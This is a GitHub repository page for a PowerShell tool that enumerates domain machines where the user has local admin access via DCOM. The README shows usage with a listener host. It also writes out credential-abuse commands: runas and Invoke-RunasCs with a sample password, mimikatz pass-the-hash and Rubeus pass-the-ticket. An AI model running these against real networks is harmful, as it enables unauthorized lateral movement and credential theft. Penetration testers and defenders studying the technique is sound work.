Skip to content
/ Find-DCOMLocalAdminAccess Public

Enumerate accessible machines across a domain or local network via DCOM-based techniques

License

BSD-3-Clause license
0 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

pol4ir/Find-DCOMLocalAdminAccess

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
Find-DCOMLocalAdminAccess.ps1
Find-DCOMLocalAdminAccess.ps1
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
test.gif
test.gif
 
 

Repository files navigation

Find-DCOMLocalAdminAccess

Enumerate accessible machines across a domain or local network via DCOM-based techniques

Usage

Find-DCOMLocalAdminAccess -lhost 192.168.56.30

Find-DCOMLocalAdminAccess -lhost 192.168.56.30 -lport 6789 -threads 5 -Computername dc.contoso.local -timeout 10000

RunAs

The script runs under the current user session. If you're in an interactive shell and need to execute it under a different security context, you can use Runas.

runas /user:contoso.local\user1 /netonly powershell

If you're working in a non-interactive shell, you can use Invoke-RunasCs

Invoke-RunasCs -Domain contoso.local -Username user1 -Password dfgV?DS7-8 -Command 'powershell . "C:\Find-DCOMLocalAdminAccess.ps1";Find-DCOMLocalAdminAccess -lhost "192.168.56.30"' -logontype 9

PTH

mimikatz.exe "sekurlsa::pth /domain:<> /user:<user> /ntlm:<hash> /run:powershell.exe"

PTT

Rubeus.exe -args ptt /ticket:<ticket>

About

Enumerate accessible machines across a domain or local network via DCOM-based techniques

Resources

Readme

License

BSD-3-Clause license
Activity

Stars

0 stars

Watchers

0 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages